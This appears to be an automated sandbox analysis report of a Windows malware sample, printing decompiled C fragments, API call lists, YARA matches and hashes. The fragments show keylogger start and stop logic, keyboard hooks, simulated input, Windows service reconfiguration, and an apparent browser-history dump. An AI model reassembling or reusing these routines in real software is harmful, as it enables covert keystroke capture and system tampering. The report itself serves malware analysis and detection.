				struct HHOOK__* _t16;
				struct HHOOK__** _t30;

				_push(__ecx);
				_t30 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x3d)) == 0) {
					_t9 = 0;
				} else {
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_v5);
					E00405DD3(__ecx);
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
					E0041203B("[INFO]",  &_v6, "Online Keylogger Stopped",  &_v5, "Online Keylogger Stopped");
					_t30[0xf] = 0;
					_t6 =  &(_t30[0xd]); // 0x0
					_t30[0xa] = 0;
					CloseHandle( *_t6);
					if(_t30[0xf] == 0) {
						_t16 =  *_t30;
						if(_t16 != 0) {
							UnhookWindowsHookEx(_t16);
							 *_t30 = 0;
						}
					}
					_t9 = 1;
				}
				return _t9;
			}








                                        0x00405ccd
                                        0x00405cd0
                                        0x00405cd8
                                        0x00405d49
                                        0x00405cda
                                        0x00405ce9
                                        0x00405cf1
                                        0x00405d00
                                        0x00405d14
                                        0x00405d1a
                                        0x00405d22
                                        0x00405d25
                                        0x00405d28
                                        0x00405d2b
                                        0x00405d34
                                        0x00405d36
                                        0x00405d3a
                                        0x00405d3d
                                        0x00405d43
                                        0x00405d43
                                        0x00405d3a
                                        0x00405d45
                                        0x00405d45
                                        0x00405d4f

                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Online Keylogger Stopped,?,?,0040D1F8,0040D2A6,00000001), ref: 00405CE9
                                          • Part of subcall function 00405DD3: GetLocalTime.KERNEL32(?,73B743E0,Offline Keylogger Started,?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DE1
                                          • Part of subcall function 00405DD3: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,[%04i/%02i/%02i %02i:%02i:%02i ,?,],?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DF9
                                          • Part of subcall function 00405DD3: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,]), ref: 00405E06
                                          • Part of subcall function 00405DD3: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,]), ref: 00405E12
                                          • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E1B
                                          • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E24
                                          • Part of subcall function 00405DD3: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,]), ref: 00405E2D
                                          • Part of subcall function 00405DD3: malloc.MSVCRT ref: 00405E37
                                          • Part of subcall function 00405DD3: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,004051C6,?,?,?,?,]), ref: 00405E61
                                          • Part of subcall function 00405DD3: sprintf.MSVCRT ref: 00405E69
                                          • Part of subcall function 00405DD3: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E7C
                                          • Part of subcall function 00405DD3: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E8C
                                          • Part of subcall function 00405DD3: SetEvent.KERNEL32(00000000), ref: 00405E95
                                          • Part of subcall function 00405DD3: free.MSVCRT(00000000), ref: 00405E9C
                                          • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405EA6
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Online Keylogger Stopped,?), ref: 00405D00
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 00405D14
                                          • Part of subcall function 0041203B: GetLocalTime.KERNEL32(?), ref: 00412052
                                          • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,%02i:%02i:%02i:%03i ,?,00416BFC,?,00415770,?,?,Q@,?), ref: 00412087
                                          • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,Q@,?), ref: 00412094
                                          • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,Q@,?), ref: 004120A1
                                          • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,Q@,?), ref: 004120AE
                                          • Part of subcall function 0041203B: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,Q@,?), ref: 004120B8
                                          • Part of subcall function 0041203B: printf.MSVCRT ref: 004120BF
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120CB
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120D4
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120DD
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120E6
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120EF
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120F8
                                        • CloseHandle.KERNEL32(00000000), ref: 00405D2B
                                        • UnhookWindowsHookEx.USER32(00000000), ref: 00405D3D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@D@1@@V01@V10@$?c_str@?$basic_string@LocalTimeV10@@Y?$basic_string@$??4?$basic_string@?length@?$basic_string@CloseEventHandleHookUnhookV01@@V10@0@Windowsfreemallocprintfsprintf
                                        • String ID: Online Keylogger Stopped$[INFO]
                                        • API String ID: 2254939683-2146459034
                                        • Opcode ID: 56c00de6d7886fd817b9d7ef9925f039a649f4dd6b432ad64e9b8e8786693fde
                                        • Instruction ID: 054b4bc7c437e62fba5109071e9382fc7819d51c50d88b2d3918446dea0eff9a
                                        • Opcode Fuzzy Hash: 56c00de6d7886fd817b9d7ef9925f039a649f4dd6b432ad64e9b8e8786693fde
                                        • Instruction Fuzzy Hash: 7701F575600A04AFD710BB69DC898FFBBACEE85240340497FE84293241D779AD458FA9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00410440, Relevance: 12.1, APIs: 8, Instructions: 86keyboardCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendInput.USER32(00000001,0041021D,0000001C,?,?,00000000,0041021D), ref: 0041046B
                                        • SendInput.USER32(00000001,0041021D,0000001C,?,?,00000000,0041021D), ref: 00410483
                                        • SendInput.USER32(00000001,0041021D,0000001C,?,?,00000000,0041021D), ref: 0041049B
                                        • SendInput.USER32(00000001,0041021D,0000001C,?,?,00000000,0041021D), ref: 004104B0
                                        • SendInput.USER32(00000001,0041021D,0000001C,?,?,00000000,0041021D), ref: 004104C3
                                        • SendInput.USER32(00000001,0041021D,0000001C,?,?,00000000,0041021D), ref: 004104DA
                                        • SendInput.USER32(00000001,0041021D,0000001C,?,?,00000000,0041021D), ref: 004104F1
                                        • SendInput.USER32(00000001,0041021D,0000001C,?,?,00000000,0041021D), ref: 00410508
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: InputSend
                                        • String ID:
                                        • API String ID: 3431551938-0
                                        • Opcode ID: 64c49b0a3cb83d2657ffcb26cf9337e97bedcfabef8349bdbe6acd24d5a92541
                                        • Instruction ID: b328bb317d865897fc6c08efdded885432bfecfaa75727484ced0e6d4c13fc0d
                                        • Opcode Fuzzy Hash: 64c49b0a3cb83d2657ffcb26cf9337e97bedcfabef8349bdbe6acd24d5a92541
                                        • Instruction Fuzzy Hash: F03121B1D5124EA9EB11EF949981FFFBFBCAF18301F504026E640B6142D3B446859BE6
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00411927, Relevance: 12.1, APIs: 8, Instructions: 64serviceCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 48%
                                        			E00411927(void* _a4, signed char _a20) {
				short* _t6;
				signed int _t9;
				void* _t14;
				short* _t17;
				int _t19;
				void* _t21;
				void* _t22;

				_t17 = 0;
				_t6 = OpenSCManagerW(0, 0, 2);
				_t22 = _t6;
				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
				_t21 = OpenServiceW(_t22, _t6, 2);
				if(_t21 != 0) {
					_t19 =  &_a4 | 0xffffffff;
					_t9 = _a20 & 0x000000ff;
					if(_t9 == 0) {
						_push(4);
						goto L8;
					} else {
						_t14 = _t9 - 1;
						if(_t14 == 0) {
							_push(2);
							goto L8;
						} else {
							if(_t14 == 1) {
								_push(3);
								L8:
								_pop(_t19);
							}
						}
					}
					_t17 = _t17 & 0xffffff00 | ChangeServiceConfigW(_t21, 0xffffffff, _t19, 0xffffffff, _t17, _t17, _t17, _t17, _t17, _t17, _t17) != 0x00000000;
					CloseServiceHandle(_t22);
					CloseServiceHandle(_t21);
				} else {
					CloseServiceHandle(_t22);
				}
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				return _t17;
			}










                                        0x0041192d
                                        0x00411933
                                        0x0041193e
                                        0x00411940
                                        0x0041194e
                                        0x00411952
                                        0x00411961
                                        0x00411964
                                        0x00411966
                                        0x00411976
                                        0x00000000
                                        0x00411968
                                        0x00411968
                                        0x00411969
                                        0x00411972
                                        0x00000000
                                        0x0041196b
                                        0x0041196c
                                        0x0041196e
                                        0x00411978
                                        0x00411978
                                        0x00411978
                                        0x0041196c
                                        0x00411969
                                        0x00411995
                                        0x00411998
                                        0x0041199b
                                        0x00411954
                                        0x00411955
                                        0x00411955
                                        0x004119a0
                                        0x004119ac

                                        APIs
                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,Function_0001B310,?,?,00410FD9), ref: 00411933
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000002,?,?,00410FD9), ref: 00411940
                                        • OpenServiceW.ADVAPI32(00000000,00000000,?,?,00410FD9), ref: 00411948
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,00410FD9), ref: 00411955
                                        • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00410FD9), ref: 00411986
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,00410FD9), ref: 00411998
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,00410FD9), ref: 0041199B
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,00410FD9), ref: 004119A0
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: Service$CloseHandle$G@2@@std@@G@std@@OpenU?$char_traits@V?$allocator@$??1?$basic_string@?c_str@?$basic_string@ChangeConfigManager
                                        • String ID:
                                        • API String ID: 760094045-0
                                        • Opcode ID: 68ba0aa1ba6e0b63eb6d3d48f3e20857e4095fce90bd2a8d358d3e5e3e14f0d4
                                        • Instruction ID: c2fa0ded83cb97236bb08be5de2499f982cdcb79c4471a71361dcbc3e7912862
                                        • Opcode Fuzzy Hash: 68ba0aa1ba6e0b63eb6d3d48f3e20857e4095fce90bd2a8d358d3e5e3e14f0d4
                                        • Instruction Fuzzy Hash: 2201D2B1120528BAE6001B709C99EFB3F5CEF453B0B044226F632961E0CA644D81C9E9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00401A5E, Relevance: 12.1, APIs: 8, Instructions: 62COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 28%
                                        			E00401A5E(intOrPtr* __eax, void* __eflags, void* _a8) {
				char _v20;
				char _v36;
				void* _t18;
				void* _t20;
				intOrPtr _t39;

				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				_t39 =  *__eax;
				__imp__?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z();
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
				E004129EB(__eflags,  &_v20,  &_v36,  &E0041B310,  &_v36, 4,  *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB);
				_t18 = _t39 - 0x9b;
				if(_t18 == 0) {
					__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(E0040180C( &_v20, __eflags, 1));
					 *0x41b288 = 1;
					_t20 = E0040180C( &_v20, __eflags, 0);
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
					E004020C2(0x41b240, 0x9c, _t20);
				} else {
					if(_t18 == 0) {
						E00401B26();
					}
				}
				E004017DD( &_v20);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return 0;
			}








                                        0x00401a68
                                        0x00401a6e
                                        0x00401a80
                                        0x00401a90
                                        0x00401a9f
                                        0x00401aa9
                                        0x00401ab3
                                        0x00401ab8
                                        0x00401ad5
                                        0x00401ae0
                                        0x00401ae7
                                        0x00401af2
                                        0x00401b02
                                        0x00401aba
                                        0x00401abc
                                        0x00401abe
                                        0x00401abe
                                        0x00401abc
                                        0x00401b0a
                                        0x00401b12
                                        0x00401b1b
                                        0x00401b25

                                        APIs
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00401A68
                                        • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,6F5E5DF0), ref: 00401A80
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 00401A90
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00401A9F
                                          • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                          • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                          • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                          • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,00000001), ref: 00401AD5
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 00401AF2
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000009C), ref: 00401B12
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401B1B
                                          • Part of subcall function 00401B26: GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00401B3E
                                          • Part of subcall function 00401B26: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00401B4B
                                          • Part of subcall function 00401B26: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00401B5D
                                          • Part of subcall function 00401B26: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401B75
                                          • Part of subcall function 00401B26: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00401B80
                                          • Part of subcall function 00401B26: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60( /sort "Visit Time" /stext ",?,?,00415628,00000000), ref: 00401B9C
                                          • Part of subcall function 00401B26: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 00401BAE
                                          • Part of subcall function 00401B26: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401BBB
                                          • Part of subcall function 00401B26: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00401BC8
                                          • Part of subcall function 00401B26: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00401BD2
                                          • Part of subcall function 00401B26: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00401BE3
                                          • Part of subcall function 00401B26: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00401BEC
                                          • Part of subcall function 00401B26: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00401BF5
                                          • Part of subcall function 00401B26: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00401BFE
                                          • Part of subcall function 00401B26: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 00401C0D
                                          • Part of subcall function 00401B26: Sleep.KERNEL32(000000FA), ref: 00401C24
                                          • Part of subcall function 00401B26: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(0000009D), ref: 00401C35
                                          • Part of subcall function 00401B26: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401C3E
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$??1?$basic_string@$G@std@@$G@2@@std@@$??0?$basic_string@$?c_str@?$basic_string@V01@@$?length@?$basic_string@G@2@@0@Hstd@@V12@V?$basic_string@$??4?$basic_string@?substr@?$basic_string@D@1@@V01@$?find@?$basic_string@FileG@1@@ModuleNameSleepV10@V10@0@V10@@
                                        • String ID:
                                        • API String ID: 573486607-0
                                        • Opcode ID: 0444dc97c48bc4e2f82eff9e350e899fd224b97dfb04b76e2a9bcbee0c6a45e8
                                        • Instruction ID: 745551a8169cf10c7f688d11d93f95233c425957d6d772b9d422287574ec9151
                                        • Opcode Fuzzy Hash: 0444dc97c48bc4e2f82eff9e350e899fd224b97dfb04b76e2a9bcbee0c6a45e8
                                        • Instruction Fuzzy Hash: 2D11A23160060DDBCB04FBA5DD5AAEE3778EB48304F008439F912A72E1EF785544CBA9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00411859, Relevance: 12.0, APIs: 8, Instructions: 44serviceCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 68%
                                        			E00411859(void* _a4) {
				struct _SERVICE_STATUS _v32;
				short* _t6;
				signed int _t14;
				void* _t17;
				void* _t18;

				_t14 = 0;
				_t6 = OpenSCManagerW(0, 0, 0x40);
				_t18 = _t6;
				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
				_t17 = OpenServiceW(_t18, _t6, 0x40);
				if(_t17 != 0) {
					_t14 = 0 | ControlService(_t17, 2,  &_v32) != 0x00000000;
					CloseServiceHandle(_t18);
					CloseServiceHandle(_t17);
				} else {
					CloseServiceHandle(_t18);
				}
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				return _t14;
			}








                                        0x00411862
                                        0x00411868
                                        0x00411873
                                        0x00411875
                                        0x00411883
                                        0x00411887
                                        0x004118a8
                                        0x004118ab
                                        0x004118ae
                                        0x00411889
                                        0x0041188a
                                        0x0041188a
                                        0x004118b3
                                        0x004118bf

                                        APIs
                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,Function_0001B310,?,?,?,?,?,?,?,004111F9), ref: 00411868
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000040,?,?,?,?,?,?,?,004111F9), ref: 00411875
                                        • OpenServiceW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,004111F9), ref: 0041187D
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,004111F9), ref: 0041188A
                                        • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,?,004111F9), ref: 00411899
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,004111F9), ref: 004118AB
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,004111F9), ref: 004118AE
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,004111F9), ref: 004118B3
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: Service$CloseHandle$G@2@@std@@G@std@@OpenU?$char_traits@V?$allocator@$??1?$basic_string@?c_str@?$basic_string@ControlManager
                                        • String ID:
                                        • API String ID: 858787766-0
                                        • Opcode ID: cb019a389b407e0f39cc257e6cab2f96e1b8a4e5817695bb663befdd35136c94
                                        • Instruction ID: 456a524f7c11b696f934a25de41654fa22df35ab19f263cd8204020f404e56b2
                                        • Opcode Fuzzy Hash: cb019a389b407e0f39cc257e6cab2f96e1b8a4e5817695bb663befdd35136c94
                                        • Instruction Fuzzy Hash: 39F04471510518EFD3107FB4AC89EFF3F6CDF89790B448025FA0692150D7749D468AE9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004118C0, Relevance: 12.0, APIs: 8, Instructions: 44serviceCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 68%
                                        			E004118C0(void* _a4) {
				struct _SERVICE_STATUS _v32;
				short* _t6;
				signed int _t14;
				void* _t17;
				void* _t18;

				_t14 = 0;
				_t6 = OpenSCManagerW(0, 0, 0x40);
				_t18 = _t6;
				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
				_t17 = OpenServiceW(_t18, _t6, 0x40);
				if(_t17 != 0) {
					_t14 = 0 | ControlService(_t17, 3,  &_v32) != 0x00000000;
					CloseServiceHandle(_t18);
					CloseServiceHandle(_t17);
				} else {
					CloseServiceHandle(_t18);
				}
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				return _t14;
			}








                                        0x004118c9
                                        0x004118cf
                                        0x004118da
                                        0x004118dc
                                        0x004118ea
                                        0x004118ee
                                        0x0041190f
                                        0x00411912
                                        0x00411915
                                        0x004118f0
                                        0x004118f1
                                        0x004118f1
                                        0x0041191a
                                        0x00411926

                                        APIs
                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,Function_0001B310,?,?,?,?,?,?,?,00411168), ref: 004118CF
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000040,?,?,?,?,?,?,?,00411168), ref: 004118DC
                                        • OpenServiceW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00411168), ref: 004118E4
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,00411168), ref: 004118F1
                                        • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,?,00411168), ref: 00411900
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,00411168), ref: 00411912
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,00411168), ref: 00411915
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00411168), ref: 0041191A
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
